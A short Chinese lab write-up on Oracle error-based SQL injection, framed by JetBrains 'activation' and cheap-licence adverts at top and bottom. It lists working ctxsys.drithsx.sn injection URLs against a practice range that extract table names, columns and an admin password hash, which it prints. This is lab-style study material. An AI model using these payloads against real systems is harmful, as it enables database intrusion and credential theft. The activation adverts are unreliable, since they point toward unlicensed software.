大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。
Jetbrains全系列IDE稳定放心使用
Oracle报错注入原理
通过ctxsys.drithsx.sn(user,查询语句)函数来根据页面报错获取我们需要的内容
注意事项:
1.oracle数据库在查询时,必须写表名,如果表不存在可以使用虚表 dual
2.Oracle数据库的字段数据类型是强匹配,必须保持数据类型相同
3.Oracle系统表 all_tables、user_tables、all_tab_columns、user_tab_columns
4.oracle限制查询结果返回的数量用rownum
靶场:http://59.63.200.79:8808/?id=1
拿表名
http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(‘user’,(select table_name from (select table_name,rownum r from user_tables) where r=3))
发现Admin,news,md5 三个表
拿admin中的字段
http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(‘user’,(select column_name from (select column_name,rownum r from user_tab_columns) where r=2))
发现UNAME,UPASS,MD5等字段,我们拿UPASS中的数据
http://59.63.200.79:8808/?id=1 and 1=ctxsys.drithsx.sn(‘user’,(select upass from (select upass,rownum r from admin) where r=2))
拿到数据
2a61f8bcfe7535eadcfa69eb4406ceb9
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/188858.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...